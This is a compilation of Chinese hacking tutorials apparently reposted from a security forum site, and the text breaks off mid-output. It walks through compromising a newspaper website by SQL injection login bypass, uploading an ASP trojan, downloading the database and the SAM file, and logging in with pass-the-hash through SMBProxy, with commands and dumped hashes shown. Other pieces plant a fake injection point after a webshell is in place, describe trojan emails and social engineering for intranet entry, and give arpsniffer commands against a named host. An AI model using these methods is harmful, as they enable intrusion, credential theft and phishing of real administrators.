渗透技术.txt

木马木马木马木马木马木马木马木马木马木马木马木马木马木马木马木马木马木马木马

失去了跟主机的连接。  
呵呵 IIS5.0 …… 可惜啊，没有WedDAV溢出漏洞。不错！网管很负责，已经贴好补丁了！值得表扬……  
4、139、445  
不错 还有NetBIOS和IPC$共享不错，刺探了一下，得到了用户名和共享列表。  
5、3389  
没有紫光输入法又是windows2000+sp3+ W2K_sp4_x86_CN 别想了 等拿到administrator的权限再说吧！  

看来从这些方面考虑，暂时是行不通的了。于是我打开了网站的主页，看看是某日报的网站，呵呵！新闻很多啊！看看，是ASP的界面，很好的东东与法简单、可读性强，但是漏洞也不少，多是由于编程者的疏忽造成的，好办让我来浏览一下整个网站……  
管理页面在哪里？试一下吧（社会工程学初级应用）！  

http://www.target.net/admin/ 没有 啊 无法显示  
http://www.target.net/admin.asp 不行  
http://www.target.net/manger.asp 嗯？出来了……  
http://www.target.net/pass.asp 回头一看……哦？不是朋友提供的地址吗？  
看看吧！要我输入用户名和密码，嗯——是个难题，呵呵，原来他就是想要这个啊！好！试试这个：在密码栏里面我输入了asp’or’1呵呵，进去了！为什么？来看这个！  
在ASP程序中，用户名和密码的校验是通过这样的MSSQL语句实现的：  
mydsn=” select * from user where user =’ ”&user&” ’ and pwd = ‘ ”&pwd&” ’ ” 如果”&pwd&”变成了asp’or’1意味着什么？带入看看  
mydsn=” select * from user where user =’ ”&user&” ’ and pwd = ‘ asp ’ or ’ 1 ’ ” 这些罗计算都是同级的从左到右看”&user&” and pwd = ‘ asp ’ 运算的结果为0 ，0 or 1 的结果是1 呵呵 所以就通过了！  
进去之后干什么？由于看到发布文章的同时可是粘贴图片附件，嘿嘿！我来看看，打开发表文章的页面果然有上传附件的地方，看来运气不错（不要高兴得太早，还不知道能上传什么哪）！点击粘贴附件，嘿嘿看到了什么现实的时候没有扩展名的过滤，是所有文件，意味着什么？哈哈！上传的文件当然也是所有类型啦！  
我上传了ASP木马，系统自动编号了。01090208.asp呵呵，问题在哪里呢？来找一找……头大！又是动脑思考的时候了。看看他的数据库吧！于是……  
http://www.target.net/data/ 不错！您没有权限…… 哈哈 原来真在这里啊！再试！  
http://www.target.net/data/database.mdb 没有找到文件  
http://www.target.net/data/target.mdb 嗯！行了！下载下来看！  
呵呵！里面由用户列表、文章列表、还有系统统计——要的就是它！哈！果然找到了，01090208.asp的绝对路径就在里面，好，输入到浏览器里面看看……出来了！  

[img]/UpLoadFiles/NewsPhoto/a5_885_1.jpg[/img]  

好！copy SAM文件到网页根目录下载，在命令行里面输入：  
copy d:\winnt\repair\sam e:\www.target.net\sam._  

已成功复制1个文件，好了，在浏览器里面输入：  
http://www.target.net/sam._  

下载完毕……  

下一步？LC4破解？不不！用新方法SMBProxy 登录！嘻嘻！新东西！  
简介:  
如果拿到一个远程主机NTLMHash密码信息, 一般都会使用暴力破解来获取密码,这个程序可以使用proxy方式与远程主机验证登陆,来达到快速进入的目的.  

SMBProxy程序只认可pwdump格式的密码信息,LC格式不行，所以要将我得到的SAM文件转换为pwdump格式。  
pwdump格式转换方法  

先打开LC3，将SAM文件导入程序，随便选择一个模式进行破解，停止破解。  
[img]/UpLoadFiles/NewsPhoto/5_885_19.jpg[/img]  
将项目保存为LC3的文件格式——*.lcs。  
使用SMBProxy自带的工具将LC格式的文件转换为pwdump格式。  
E:\>perl lc3_conv.pl 2.lcs  
Administrator:500:89B9639B628096295FBE6BDC86679876:C6EBC896A3C134D4CF18063C33ACC926:::  
Guest:501:4316EDA750394C6B120438C30F7F1819:00000000000000000000000000000000:::  
TsInternetUser:1000:1987DC7B3DE4A42761541729CD9CDFDD:28212D01DDEF0A91BA9022173515E9A6:::  
…………………………  
转换完毕  


1. 停掉本机server服务,因为此程序默认使用127.0.0.1的139端口  
net stop server  
2. 运行本程序  
smbproxy -s target -f pwdump3.txt 好了  
3. 通过本地代理登陆远程主机  
net use * \\127.0.0.1\c$Content$nbsp;123456/user:administrator  

哈！成功！  
其实，不用SMBProxy也只不过是为了快一点登录，使用LC4破解也是可行的，主要还是因为我很懒……?  
擦出了痕迹，归还了权限，我就撤退了，呵呵！  

后记：关于ASP漏洞的补救，我不是很在行，只是提一些建议吧！  
将user = Trim(Request(“user”))改为user = Replace(Trim(Request(“user”)),” ”,” ’ ”) 以实现 ” ‘ ” 的过滤（被替换为空格）。  
数据库的下载是我猜解的，但是有这样的一种方法是绝对可行的。ASP使用一个连接文件将数据导入数据库文件这个文件一般以inc为扩展名，而且一般命名为conn.inc如果将它下载下来，就意味着数据库路径的暴露，所以要将conn..inc改为asp后缀，同时把数据库文件也改为asp扩展名并修改连接文件中的相关语句。  
对于上传文件限制的代码，我就不太懂了，不过有很多资料啊！  
其实系统的安全只不过是站点安全的一个重要组成部分，服务程序（web页面）的漏洞也会导致系统安全防线的崩溃，这次渗透功击就是一个例子。  


@@@@@@@@@@

自己伪造注入点方便渗透 
 
安全中国 www.anqn.com 更新时间:2007-7-2 0:28:06 责任编辑:池天 
 
 
热 点：  
 
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点，然后方便渗透，找到更多的可利用的信息

这两天一直考试，想了下，就先仍出来，有什么问题可以提出来，我们一起讨论！

首先你要拿了一个webshell，这样你找到连接数据库的文件，大多都是conn.asp这个文件里面有mssql的用户和

密码，你要找到用户名、密码、数据库所在的IP，然后连接上去，至于连接大家应该都会，找到网站管理员的表

因为我测试的时候是用管理员的表，我朋友说任何表名都可以，只要这个表存在，代码如下：

程序代码
<!--#include file="xx.asp"-->
<%
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id 
rs.open strSQL,conn,1,3
rs.close
%>

把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名，注意必须存在

你可以连接上去看下表名就是了！这里假设的是admin是表名！这个文件名随便保存！

然后就要构造一个连接数据库的文件了，代码如下：
程序代码
<%        
strSQLServerName = "000.000.000.000"     '服务器名称或地址
strSQLDBUserName = "sqlname"         '数据库帐号
strSQLDBPassword = "sqlpass"         '数据库密码
strSQLDBName = "sqldataname"           '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
%>

这里应该都会了，就不罗嗦了，不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话，

就这样，正常情况下，就OK了，伪造成功…… 

           如果有什么问题可以提出来大家一起探讨解决。
    
 
@@@@@@@@@@

内网渗透——如何打开突破口 
 
安全中国 www.anqn.com 更新时间:2007-7-7 1:36:34 责任编辑:池天 
 
 
热 点：  
 
内网渗透的思想是源于特洛伊木马的思想---堡垒最容易从内部攻破，一个大型的网站，一个大型的公司，一个大型的目标，在外肉，管理员总会千方百计的加强防范和修补漏洞，常规的方法进去几乎是不可能。
内网渗透的突破口是我们如何得到一个内网的个人机或是内网的服务器，我个人的经验有三种，一是从外网分站渗透到内网，二是发木马信得到内网机器，三是利用取得信任得到内网机器。
一、从外网分站渗透到内网
  通常一个大的站点都有很多分站，有很多我们未知的分站或是未知的站点目录，越大的站点展现在我们面前的机会就越多，可以利用传统手法得到一个分站的服务器权限，比如注入，猜解，溢出等。得到分站服务器的情况下有两种思想：一是通过分站渗到主站或是其它分站，需要它们分配有一个内网并没划分vlan的情况，这时可以通过取得密码或是内网嗅探等方式取得更多的分站。二是通过分站服务器的分析，诱使管理员中马，比如在分站服务器取得管理员的密码，收集分站上的邮箱信息，查看分站服务器的ftp信息，收集管理员常用的工具，或是管理员有可能下载回去的文件（通常是管理员传输工具的tools文件里）或是管理员保存在站点目录的工具。
二、发木马信取得内网机器
  这应该算是一种社会工程学与漏洞的结合，比如0day，也就是word或是pdf或是ie0day发挥作用的地方。很多人拿到ie0day是直接用于挂马，其实ie0day发信的价值更高，如何欺骗管理员点击你发的邮件里的url链接也是一种艺术。也可以想想，涉及到他网站的问题，他产品的问题，这样的东西管理员总会点击的，要考虑到管理员点击后会百分之百的中这是一个技术性问题。常规的木马信发送过程中，chm的木马用得更多，因为不被杀，命中率可达百分之百，然后就要考虑到管理员会打开么？即使是客服机器中马也一样的非常有用。比如我在一次木马信的发送中，使用的附件是打包的chm，信的内容是：“使用你们的xx后，我觉得相当不错，不过在使用过程中发现一些bug，不知道是我的机器问题还是你们这方面没有考虑到，具体信息我以图文形式保存在附件中。”当然要找到目标的邮件地址，这个在网站上或是google中很容易找到的。
三、利用取得信任得到内网机器
　网站管理员或是客服，都会有email或是msn或是QQ，或是现实中的人，我们可以慢慢的套近乎，抓住他的弱点，或是心理，比如他喜欢的东西，慢慢跟他聊天，降低他的心理防线，在成熟的时候发送url，或是打包的软件里捆绑木马，也不是不可以的。具体的涉及到社会工程学方面，主要看自己怎么去发挥。


内网渗透-----如何打开突破口，这只是平时的一些经验总结，没有具体的步骤，只有一种思想，黑站已经不是一种单纯的玩注入的时代。过段时间将再写《内网渗透-----基本手法》，仅仅做技术上的探讨与分享。
　　　　　　　　　　　 


@@@@@@@@@


ARP监听渗透内网的方法 
 
安全中国 www.anqn.com 更新时间:2007-7-22 3:52:32 责任编辑:池天 
 
 
热 点：  
 
假设想攻击的主机IP是:61.139.1.79 ,同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆 

第一步: 
tracert 61.139.1.1 

C:\WIN2000\system32>tracert 61.139.1.1 

Tracing route to HACK-4FJ7EARC [61.139.1.1] 
over a maximum of 30 hops: 

1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1] 

Trace complete. 

这就说明了你想攻击的主机和你所在的主机在一个关网中那么就有可能 
进行ARPSNIFFER了 

第二步:看本机IP设置和网卡情况 
C:\WIN2000\system32>ipconfig /all 

Windows 2000 IP Configuration 

Host Name . . . . . . . . . . . . : smscomputer 
Primary DNS Suffix . . . . . . . :  本文来自无涯教程网:http://www.wuyapc.com 
Node Type . . . . . . . . . . . . : Broadcast 
IP Routing Enabled. . . . . . . . : No 
WINS Proxy Enabled. . . . . . . . : No 

Ethernet adapter Intel Fast Ethernet LAN Controller - onboard: 

Connection-specific DNS Suffix . : 
Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection 
Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6 
DHCP Enabled. . . . . . . . . . . : No 
IP Address. . . . . . . . . . . . : 61.139.1.2  
本文来自无涯教程网:http://www.wuyapc.com


Subnet Mask . . . . . . . . . . . : 255.255.255.0 
Default Gateway . . . . . . . . . : 61.139.1.65 
DNS Servers . . . . . . . . . . . : 61.139.1.73 

说明只有一块网卡那么在执行ARPSNIFFER的时候就可以不要第五个参数了这个地 
方小榕的主页可没有说哟,经过测试我发觉如果只有一块网卡你第五个参数使用0 
的话也只能嗅探到通过自已的数据哟. 
从上面我们还可以知道网关是61.139.1.65 

第三步:查看本机时间 
C:\WIN2000\system32>net time \\127.0.0.1 

\\127.0.0.1 的当前时间是 2003/1/28 下午 09:13 

命令完成成功 

要注意的是这儿的时间是12小时式,用at命令应要24小时式 

第四步:编写启动ARPsniffer的bat文件  本文来自无涯教程网:http://www.wuyapc.com 
C:\WIN2000\system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:\winnt\a.bat 

注意咯我们没有要第五个参数,如果有多个网卡的话你就要先直接执行arpsniffer显示如下: 
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB 
www.netXeyes.com 2002, security@vip.sina.com 

Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter